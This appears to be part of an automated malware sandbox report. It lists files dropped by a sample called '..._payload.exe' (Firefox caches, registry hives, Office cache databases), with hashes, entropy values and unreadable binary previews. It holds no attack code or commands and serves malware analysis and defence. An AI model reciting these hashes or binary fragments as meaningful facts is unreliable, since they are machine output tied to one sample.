                                                                                                                                                                      Preview:# Thi.M......z....3o.l.....X.e.F......D..8..)...ot./].E.5.K{E9..ks.\7.%Q.\/.[w.~:...<.X...#.....?.o<t)]..?Hv....~......i+[.....s..\.7X wPd..T..&..<a.wI:......G..1..;r;HN?4T=..."........'...0x...#..{7.Cj..k.*1..RG(~.(.'..G.-Ym...p.s...,AZo..@...=...2..,...=OP........=...6....B....p...3...EX..+.9....<+.T...lmb....T|.n.......2.(.:3....e.E....*.b....^..|..Vp.?.\...o:iG..eK....P.V...R.z.<. .N.~{..'oD..j.]..4I..eq%..q..'.9.I.%._.6.|C.wI.X.......*+{)..t....TH8.....N|&l.c.`G...[b../..hU..m%..Z.Y9.>.,|.O......._H...Y..Xz.W_.M...Tz.p. ....B....e..s....D...3.W]N..5.z...dv@5..!....?u..1.8t.G.o..@.,Z^e.!..b.q....*O.j..kD.=.;.....<.}_g.m....J.k.....B..\.TBG_..+..FK'.......R.T .k]w..1.#.....5h.....2f|5..-..z......I\....ov.ZL.jg5...<.`....!a.vv.<....3..#%....O...A.Z;......&s.z.).gg...'.;P......3^.4'..\.D.<. ....1.....3M...cN..p2y.d%$.uCf......z1.U?b....2V..9x3.../..P..5.R...do.F.c......@..b.4..G...x...M.2.G..*.......v8.I..j...S.gY.F...@I.jA.0C....k...1.p..q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2046434
                                                                                                                                                                      Entropy (8bit):5.076040225085712
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7UhiYSJuqYKRKDfKeyWmC4xqcGG487l/bpO7oypPA1OEiCIuRhRuPoCnE2ZzNYLH:QlzKAJywcGGR7l/bqs6BjUNR+U
                                                                                                                                                                      MD5:FE21C4E32803DAFF62F077C63E008D06
                                                                                                                                                                      SHA1:CD1E540869D5E8637D991424B4D093A804937847
                                                                                                                                                                      SHA-256:106178AA5175E3DF73F64832CBC085F19E973B2747991E0F479055532EF52B3F
                                                                                                                                                                      SHA-512:DDAA3115255168A0366905753528925C27DD78110227254C92627965E0BD0356CFE7EF27C6768888D203614678702B02344DD5323BFDA61E6BE2CBB3D14AA67E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:mozXD......2}.. .....Q.._...B....V{.s...P.<....P.3'..f....N.8..g.^..$U.;..<.7. .'..j.g........&-hC...O.S..&vo.A...rDv...../.X.)\q..n:.4.Y.)..7..6$.H...-.t.m.c...w.."....w..N.M./...+...~...~...!..u.....B.-.S...jJ.k...z e'..c.O0v|.F...RQW>=....\K...-..c..}./s<.ciw....r..[9.bN..Q..Ko.~yn........Z9......E..h..<..C.... e...x.X....{.2........O2.M...4.D.....q.It...F..nJ.J.U..?.L'3J....P.$W......jt2...`...v.[.NM..W/y.....t..Mq..Ok.QI..,......!.A0*S.P..A.B66i..O..p..|..g..w.KvXK........... .1.0#m"....f.b..K..[.B~....x...C......|.U.`......J...%..q..b..y........|.[..Ye.N....e..L.km..[.... Y..@..K&....`.|].s.-....fr.H$L...@YA.Sw.j#.l......(D..."z.....~...Zz..A..O..........T....qf..U...G...`.M+[E.!A...Oh}.EJ..S.2{J... .?[.tp5u.d,...d.qU. .O.+...u.......qFm..... -..79./..(;-.H.=..AyR..Y;.//.[..a.ffX.....!A[g..........y5#.........s....O2..f.......g.DI...|t...B.3.uwAQ.d....'B......El!..$Zs2.Wrq..<5........)Yfx.P..;...8..g...bo..2(...h2..9.z,i...F..

                                                                                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-current.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8387278
                                                                                                                                                                      Entropy (8bit):4.802623285201587
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:RZi3wTv3Dxd4C4sWDc+ikpXGGRAuAgdyR+FwDkly0CNG1Kl/S/qyal+6N7hS5BL9:Hhv8EW5IdVgdy6gn/SSyal+rP5
                                                                                                                                                                      MD5:C4A371673BC60E21CC2E89FA182CAF9F
                                                                                                                                                                      SHA1:F4380251D16FD8321E877575DE589F9162B53693
                                                                                                                                                                      SHA-256:6BFA66600DF570CCCC64D2CD1A2F96B28379B818B11CC0EB52BA102BA73700A0
                                                                                                                                                                      SHA-512:6677CD1F37D7A79AE32FF2D7E50E4DCFA9D79E082B04291680C5046414D1CFBED6A2F325C00EAE7B77E34A97367FBA8661325D87F1956B1B4426FDCB4155219A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:mozXD.M..O@...<l..sS.E.....h.G..zk.)A.+....Hc.K..uq..I....F.-g~*.......^O...?..Gw/Y.| .[.^..~..-.6.....G.F.}..Y..~.bJ4.3{.6........_i..&.DE..O..%..U8.......:...d...A.$..c..f*0. .1..loH.e..P;T...........-.......j..4{3.....@...p!...z....7zW...Q._...l:)`..pt..E..-.>.....W.|yn~6[.<.f.|...}A....1..%8.a..W.l.V@t.t.H"0.{...B@o.7..{|.'{.q..i..B.......Od......f..~+.#...E....K.......ri...._.......1.vs....Our.....`.L...+......(W*..u...'...]F.].3...a.?.A.s.K.l..2q..w.H............lw.....zRU.n...Q.V..Y...!$MM'W.....C2..5N.c}.......(=..'4<.a...\..a.M....-Adk.Y............./=?rqP...Q..;..fJ.:=...q.7"......S.4..u.!U.....*...kC....w..I....%........3..&-..:.....(.....>.miG1...`..b....^\...=..N..Y.......F.4.C..._........^.R.G.jS.. |.ry..(...5$&...U44\v.._...7....V.[....{.mZ...~....z....I....S...<7p?........./4"..@vi....1.d.....yT.Ty....?......Fm.(......b..*(..........Q0..Y/.$...-:.qn.B.A.xK.i.(.#_.."Z...._.~vER^.a.*e2.U..x...6.1A..QA0..*$...BTg..1...q

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.978695041048275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:wgi7Y2mW68Cyp45cJnBdEpZ3lBvl+2vLpd:wgRRaDhLEH3v9+m
                                                                                                                                                                      MD5:FC9109629AF4FD0CF209DA6493DC2868
                                                                                                                                                                      SHA1:656CCA3F9A57185FF47CAF0ECD7570AD39D32EF9
                                                                                                                                                                      SHA-256:A0738240699BDDC7EF26D278C8450E990789006760AEABA8BFF2FADB25DFCB3C
                                                                                                                                                                      SHA-512:599DA668268D76FE86B13D2DD90108AC9DD024B6E5A784D842948E4E295898081ACB6EAAF0E28341685CF5682F5BD64405ACDF148062FDFE198E5EE57A6B4695
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.j...a....}f.....O....OK|.C.{..6.#.U....6....^..O..j.s.|..v..y.J}..#)`.....@.]..`fWEn....JR.=.B....%".h..Y..Mvt......9B...].f....v....bG..s6'O@.....o...*.l..xI...jT...5..... wQ..`.z...d..U.....%.9.cM.!...(b..?.......~?-.R.~*....+bfk....Y*..E...._.]..V....U...=f.....p.\..&3...mVu.w[....<.D....L..n....Q....a.b.`..l.&....Ka......g.c.P0/..?Ko..xs.&F.k_....n...._.m.T.....r.7B..../.REZ..*...5.k..._.Fa.R....*.nH..s.x..b.K%......C.b.p*.5i....a....$+.?..t..J..QM.2..<.\h..]....}.q..;e........y*...h6@.......o...8.g.l......As..B...x.V...k..,t....^......;..=x6.s...;.j......%..:..e......~'$0._....M......v.=.95.S1..t.l#n~+...'....F.....P2...gm<.q#.j.1U..k..^...Y..?..jR...*..F...."....B.^DN.D.`....S=.\#.P....Xp..,.]\<..........c.......0........(.7.....6....\....p....uL2.7......m.......UG.;L.."@..;...P...f.'..WP....$..j...O...X[.S...].U...R+....%w.^......1t.E._..T].{.D.(Ml.AD .i.=...M..}..U...$OBP.L...Cd7.0.e+..@...l4....3O.s..+.......;.X....YX....+v

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.976398969642632
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:xxUdZbqd/myE1+tJt1hc40ueN2Q4yjXf+1zbFPyFaCrZ1bRRt3:LUdZWtU+tJN/eNqyjvAvqrLdRt3
                                                                                                                                                                      MD5:F389EB477C82DA21614A37B86D3F4661
                                                                                                                                                                      SHA1:7D12A2421072554297E2B83EC3A834595C0A0144
                                                                                                                                                                      SHA-256:8893F6FAF64948575B61E6018774AE64EA4008224697B005E526CC8C5843D00A
                                                                                                                                                                      SHA-512:D9540B06D5597F02BD44BAA2A1E4DDDDA56550E1A439A6F0DDA68A6C09C0A9A6B2525961B8D2B0DB996C5ECC6881B032EC725F49117E5D45DC196F874BC238F1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.@..........4.Rq9.Y,.h.ck.-.8...B..@.o.p;.R........W.r.Egv..../?..z...4...=......[5......OS...2.D.>A...9...3W...e.YO.....!.......l.k..~oq..1.1.8.O...Y.y.zm.......n...........T..\.Fo~.BcH..LMr..#......T...x...<.r...)]1...7.7}..p'Ty..S.z.*.,.J..-...PL../..{..x.`O[.$.....W....\~..L.....#.g.l....H...;..h~..Y.8].f..8#.sD'..}V..'.,.[.W...)xe..h.tZ...<..b..H..!&fFc..'.A....X7s../#....v5n.7V..Q..>!d.&._....[i`.F.?[......M...b....y..........^..F..F.....f.g.j.D..$...B%D.a..uP.....p..j...gA4.) z..|.A.#?&..W..../.0...s..V..9&....gj...s..7.3=.....+.X.t............u.a,.b/N..............yV.sJ.,...<..W~.;......r.e...s..u.....jR..N..T+c....D2.....%..=6.hr@5HB>.=W...I....A.3Js..cr..g.C..u,...^.$Ru.Z.ZA..i..\N........7..u>..vt.W...Fh....z...2.... ...,]8.;+&..^Q..&.].......6....e...=......:|..Y.4e..+..8^.VnL~........3.........z,...Y.|.}..y....FA..o....."#.F1...\\L.... .13mYNC....C......`n~........F-.o*...]m......^N.:C...........xW...zve.J....w..xe..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG2

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.982178418553621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:j/U5tZHPzpAPCT/lle3I9XqxUZmkk/vCJG9V1ykj/7kTjop+lhE5Oi:TU5TtAPu/eOaxUZFkneG9V3jj86+3i
                                                                                                                                                                      MD5:9F710F0EF0EEBCDC08D5B4DB16495ABE
                                                                                                                                                                      SHA1:7105F4803EF123FF5A1D9AED3647E8FA673B8222
                                                                                                                                                                      SHA-256:62C498E45020C7A39029E9D17316851436151B4A9C1D32DBB33253B9D35B44F8
                                                                                                                                                                      SHA-512:D78FE6FB413A4C4EB4ED836D32BFD421C2173D856CB091B5F894A93BDEFE88B31A75EE5728C294AFBCA2F01A7D811F16227E3EF636018C129F9C0E05435AFECE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.a.|<G..B....O.......YP..o.J..=. nf-a..b...zl..._.B..2.L....V:)]..5........`)..?....*...2!.b....x.#...Z.no...I.I......... '.rs.!-q..X.Zg......VVQ..c...i....[.cd.'t.O...T....+...[.>...'.D..M..oi..%..@..(wQ7.u].P...Z.|.7.!..2-V.........".'./1/......^#.".!J...*.. ..O:..NI-.t......Nj=>...J.."......n....[e..Q....K...KS.!......t...k...bc.i...G.XV,~...I...t...=...o. ..}tVY ...G....{.*.$..B..4....9.......d.....D.s.G)..i#.c.@WN....~4........n.>.?.IRU.h.Q.....1..z..)8R...".D..'8......QK......|.....^[}.K....g)fJ..z7Y..^....i.u..N..9~....d."..C.B...-......$...."i..L.O...#5.....!..T.....Sz.(...|w.B.A..4.t..K.F..s.@...O38..v..G...0.0...:&...>Q.1..p..U..p^.-..9[. ...q._.H.M.r.=.e...(j...\|..........n.1..+X.?.a...C..^...bp;..8.C...5.u...c..?.p{...Ow.Em9.K..Zq.]A.o5..3.|.R.z.."f0.....dI..sE6,x...G..}..GGA.8-....<.............D....o.X.....!.....A.^i.l-..@.."n|ew..c.*.\.r.D{h/..-j.=......g..Y.........7..t.M.....5(K...1Ve..Xy$v.....T\....+^.].}.NUM..>.2..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1573198
                                                                                                                                                                      Entropy (8bit):1.3862163671742471
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:O/3/827Sea4DKsuFJwOEDqJY+J4u6wU3WDGg6+UsYUlmqSKCcr3U+6TxGRuP4AMH:OM2GmuF/JvK1v86bHMcK1bcGRuoBX
                                                                                                                                                                      MD5:BB5132F74D309A707AF5A9B30247BE07
                                                                                                                                                                      SHA1:68D78710FAEA7AF31C6020CAB91A3CE0F4E5B2F9
                                                                                                                                                                      SHA-256:2D8689A547E0F79598FC45401F34DE903C38D29797B5DFAE915D81F10089B676
                                                                                                                                                                      SHA-512:96047966BEC8BC17FB0AAA5AE154DC9FF07991AA2CBE693E3A255ECEB59EA23DADF2A25EF41729031EC12DD3BED18299589267254396E85B9583B3CA20BC80DF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:o....$._.3.5u.%.-R`...1..@Rg#.N.g)......0...1...H...lPc...V..o.+g..w o..|g....-..m]~..,w...i.}0f..r.}..L.)...Q.~.....zk2K..1..e.:7J..".)oxtI...q..Br.....lil.....V...pph...M_1s....;....=.......@.n.!.I}I...+...U.....Y.n..... ..1.}..".b.$.i.....G$...*bg.I.-....C.Q..>..WoP'.......|..R%....R.../..3uaU/.:'|*~3....>..J....e>../..(NW.....VN.w.....1[.:^+p....x.Tni.i..(..K.?.Jn<.n........3n]{..),p...z..sU../M.Vr.B.A.#...w@.V......i.2p.G.....F...H8....gUm..N..Gk..Y.~..,.@..T.s....R..........G6.M1.......t.E....rj....J.!........"y.D...IN.F..+P.....<...M..u..`../OW@.,,HwM..3...&..DA.'..h.B....J'....Jv.].ZI...m.o.f./.0..uI..1.H.<z\......Z....6..'..3..'w.h......K...)>...h,.+...X..fN]..8..wC(.~|.*.c..S%.<..&J1...F..[31:.. .'....X..e.ve...4 b%d..LT.,..L.1.O/...Om.....r@.W..!.FWq...H...^QY..=...].)2..*.t....Z.......l.A...g...&zp.h..x....C ..~A..k ..]Ck...).#....].....,..._.Ma.'..8.?.,i.4....c..7.N.i..c....G.$..IH.0...F.Z..>(....2.. a.1.mo..fi..8"h.v....n

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.988791695128912
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:XwJc23a+wLaAtrq9rjgArgdP7x1tyqm4PSmyDl0fr+w2:XwCE9t0rMgRTxbyqms8IQ
                                                                                                                                                                      MD5:7C94F1E46F4F133F840758641FC17147
                                                                                                                                                                      SHA1:BF4F17562ED92A1AF2CB782E439315AFE0B65F13
                                                                                                                                                                      SHA-256:342D794F6178DCF8CA79F83502EE0C928AE5514DDF927DC0D06DEA6630A27201
                                                                                                                                                                      SHA-512:E987262B9920EF73713804C21CF93B62674574BA01893B3ADF2A265F1CDAD76EFD83C48E266C46F5350EF13D426CC66A60327951F69C5C73FCC45DA0827E05CC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............z.Y..h..}T...(._.."./X8~....g....v.....S.G..B.r.^...].:..z2.+H...X[.L."S0....Q....Qx..#.._.E......K.|c.fi.......)$...m..05.6../w).qI...c.u...%..6.8..l.<..ld3.......Gn.Qk...XZq...W...6.k?..*....{.p...R.xz....G.*d...x.]3..s......i.......K..>yk`=.t.*^bD..L..J.......B.1........5.H......5..|...Q...q..LR/.r....Xs9....;.g...p.g&..5*..q.UI........C.Q.8..Zi.$.l..n.t....I...].E..D..Q....88.~..'..$_.......m..y...../.9........+K6.6j,.dmug.=*...s..Sm..b.*....:..............;.......D6q.d\.`.D.R......`.=/&[....?.xm.+.... ....CP#...K{(.p..g...,k.K..8...Zu.G..QW$`.K<.A.j...&4@*..K.w..B+GH."........P.MV)..(....."M..q....p&t] .d.<L.&..s..^U.l............!.....d^v..../5.EV#..i[;...J.>?..=@.4..w654.]..Z...j.E^...I.....4...._...kU.&^...@V..~[.T.|Y".m...w.@.....}W.....<..=X......'..5].5.S..m.....K.............c..7.-"C.G!.).f.).O.....tSz9......eg..*.....PVx.Z.@.r.][{...5...|.v.eK.x.#.&.....>.k...........w.STwLM>D....i..=D.r........0...h........3W.kY

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.979643173669057
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:nzEchl7iLlHAyWlhujYfndMKEKmdKyc6kVGJfUncsRJfDvF62fSu8:J2l2lhgKqB648/xF+u8
                                                                                                                                                                      MD5:CDF575811721CE84475751056304391A
                                                                                                                                                                      SHA1:8292035DD24E14170FABD7D240A6021D900E633F
                                                                                                                                                                      SHA-256:9DA5D14FFED1C834D20EB0E041C7BDE81D071F452F5AFEA0E6DA3AA416578C39
                                                                                                                                                                      SHA-512:BD0C7323DE9A12DC34B1E963BCC71D7EE1401DAED49EDBE39B6C40D8B204B584782585F75745C19BADE8EFF027C31EFC3C06F43B2F5C7E65632B43DCCD857A19
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.3..,...[5.F.....PQ.../..........c.d-.....]....h..{..J!....*......y.b.....~..g.j\...s...>O...B>.... {............l3.Y.kwy.Wc...E.E..].J..$.....l2..j....zqg.[...).+>5.%...\......PF.'J..?A..4.f...S1..C............!@..%...........U5.6.A....X...K)vy..H..."...f.......|.*q.@d..-n3.g.%xh..v"(.W....Bm..!....U.@....9i...H..y...A."c....R.......X..MI8..).LN*..z.....,\;o...I...V..-.nB.sw...f5..Xs...u..C...TI....A.._g.../..g..s..~B..S...B......S.q..:d9T.y]...b..a.2...1.!`.S..!....DU.|...?....."...........&........G....$Z..ID.......[.5ZS.l..h..KZ....Rx{.YO...)._...W..2U.^.....M./.Tk..me-.d"+%.Do.'?UCA_1.7^..(sS..E....U..B...vTG.F..v.6.,......_......n...{....JAj.>".....aw?.3..|M.zB....m.&kX...S...?8F.h.....,oF..da..a|....$*....5...Y.UR..l.....U .<=.....+,nw. ....B.%/V....{x.Q.a'...(.CIC/........7;.]$..>."?z.cx.;.6.1..}m...zCer...K..q...-.... L....yf7.pa..h.....xIrt.E]....,..y/.e..h#DGo.j._.!.(.R..ow....`.8.P2.++_.$..7.Y...U..V.u. j4...Xc-.g.2.I..e}.R.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.980911252213344
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Fbop9JjlRq6pRi6rDS74uoYiXm0yLo+swRpY/Yt4V:FYHlRq2i6f8z9i2ho8XY/Yt4V
                                                                                                                                                                      MD5:6EFEDDEE79F2D543028EC0420AAAE993
                                                                                                                                                                      SHA1:DE9EC5B4CB0344FC9BCEB0573F4B862DD607488B
                                                                                                                                                                      SHA-256:91585FD78E85D567AB077813A3F576399DB48AD636318E1A2A092B41E9D65263
                                                                                                                                                                      SHA-512:1223E2C6BD2686134D3C763F39E44F93D193843BEC85FBC0DDDA6C00D7821F28F126CFE97710CEBBF4025080EA6B2CC57FA34AD368E770B186743D69B4BB57C8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf..i. #S...3...8.4..S..dN..|...^...'.........V......?.0...4....x;.R.6.Up....F.G]S.K.......to.5.....*.,/..;37l#.]).lt..]..x.w.T.|....s%....c:..e;u.v$..%.I......?9~..s....K...5.Tn}..%..-.hQG..#[.....Lw.@..[,../'..CE&.W..V.|V.(#.g.$..@...G..p}.jn\[..<.....&~..j.T.a..#...._.........9b.[..#.].RX-u2.8..-.j6....]..[D.|...s.1W..".U....BP........b'n.....l..W.....b.N....h...[.`..$yT}ho....8...x.d.M.Y.&?....u.D..........}'..+^!M&~".....w...<2.C...A..... }8>.r...T?.};...y....../.3+..w...r;T..c.E.x.....z....d.4/jn....s&j+......7..ex..7T...F_]......d...N:D-....\D.<...#.(M...8".........B....K...o...,.D=...5..7B.8..&...Y....v.....E....~...K dHy=..e.(Y6.Ha..)#e....|.....D.....F}... .F. ...w.....\.?..]+.!R..G.f.m....y.>j......y..P8d.....EG.BE.3...P*c..o...M.3....L.X./.N..3.X.s..,.<.W.p.@.N....O.{.....5...ta.a.v...i.... .4..r.}b.*96/m.$.ubp...w..E.6.v,.....,..\.0.se.K...M....d........d.{f.0...v.'?...!.._.9.N)a..&O.p.+J."l.u....RJsi.L<(.... .....l..o#O.....~.....hQ.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG2

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.978243005961604
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:RRnwUp4twXPSB+/ooGuAA8uYSOVRdrI8adT/blp:RRnp4twqmpAyYtVmRb
                                                                                                                                                                      MD5:2870B23FE7C4EC76F9FFF0AEECFE4B86
                                                                                                                                                                      SHA1:92EA0CC1ED7EE1E02BCE83F042ED2A76C71913F6
                                                                                                                                                                      SHA-256:F0AA2758729265C98DD09C169515235483E549B8B80322DB0B63BEDF7D9AE6EA
                                                                                                                                                                      SHA-512:A870516D5EBB908E82CF41C03FB24184E3EEA665F0E36654305414E68C9742B2EBD24C4D1603B9C6EAF218892AEA4E105BFCAD88E4192C003D8F1A27D75A3B80
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf....@[90h..I4b.V[ &...\..+x,.My.H_....z...j,....[X..F...J...\>".$.p.w.6.$b.{1.........x".....~.".#..YH$..*P^.......6...)....G$.9......k.hAq. ....&T.'. ..7uB.o4&.....*...:....Iyx....(..>'... ..U.....:.5.A.........:....,E.*.......O.....v.t3....JB#.,.m..X.,.y%7o+.y.,.N,>D..D.D....W.hIY...BV...B`t...1q&..k..B...h...@&..f.m?:K.T...tv.\..e(.../.......$N...[..g.D.......|3|7..&...{..#..t...oJ-1/..V....dLy.........s."y....$.)...}...7@U.Y.y.I.0.s2.N,^....@G..Jw...|..=..U%-.O...Lf....CV....J..6...=2gx.'.6x1.7..G.:1...n....F!.x...GZ.1...1_..uJ.Ck(......m...Usq..I..F.~.:..Z.{.6..|,..`y...u/...A...[q.x.*}..c"..S..b..XqH. .0|.A...k.}<...K......rQ.<..|.9.OC..o6..."`..KB3...-*#...&V..Q....>g..Ef.L.ya..*g....l......)X.......D.Z.....C......O..%PG.7.K7...#..Z...b7...d...p.f.......}6.`..5..A.......a.+."A.X..-...K...(W.].t.''F..%D...L...4Y0..7f..3...G*.@o..#.r..+tj..b....G...-.F7.[.gC......c..u..o.u.....9....#...[.o........O`.m"...G.m.n...<...Ut.$mw..F..a.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.981613075796454
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:rClqbimBziic4gw5nxBk5mO7iJQGsN8fNqSAKwgUDrYbh:oqLeUTnxBk5m+GsNBKRUPEh
                                                                                                                                                                      MD5:2A6D88C8D26FB6BDE409C68CDA734204
                                                                                                                                                                      SHA1:80B8C60D741F1BC91A2150236F6D2D8CC4E6E619
                                                                                                                                                                      SHA-256:8243EC369792DB7C2570F3638B913B45B98465B09BC1C97B8EAF257092749BA4
                                                                                                                                                                      SHA-512:6FB158AEB7543EB33163F44A149DCF8EA6D19FB7AB48A9FDA2E5367F183A95420E90D5EF796F4B4A908FD6716217C590CE091A3106B00C497A208212E9F71A70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.O..AA.!.)..;..(..0.=......`.u.....t...S%Z.&.}..i @..^~...,a.F.W.. .Qu..5..[%..V...C.dd/...#.6.>./..-;".$M1....gw.S.......OO....../p?.g....\y?l.........5......K.i.[Z.!5.Q\....:..|.+?(.A%Q.=e.L...B.=8.!V.....:....I...l..l!X=j%X.S5......C/!.l..3......^.....s.....j...U).............-.*....o.Xr.Qn..jDj7.G.........%.d.5@5.o.H...f..VU.#d.|.u..*...A..7..e...M...^...G.......s8..p/..~.Z.\a......8.+..L...J+%.....'U2....SF~5.u.3........V..R...&......7VKd.a.....i...._..]..F.W..$r.0 ....;g...9 ":..b.Z.W...tP..=....*.EqvIq.3.........m....n~.~8\e...b....$.i&..OU.&.1.H..G..e.G...N.`RU..A..d.$.8S#..H....."..iF.)Dtc|.e......~j.b..s...f...>.=.~...*.+..z....pWw.....)#....@Z4...G.0..Y.#E._C......9,.....QO.n..2R.......~yO)J.b/.....eQ.....,....l>.....NS.. .e...>..GP. ...k.S.....3R...Xo..Ex........~o!.d<.........!..."wUG?>.(.Q....3...._..|..0L..P.^...a.k.."..1..I..|.....z..K.~z!..y.........G.T.')Q.wZ..H.X.7.4.-..p`.....q[..)x.u....7B.S~...KK..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat.LOG1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.9788160689352035
                                                                                                                                                                      Encrypted:false
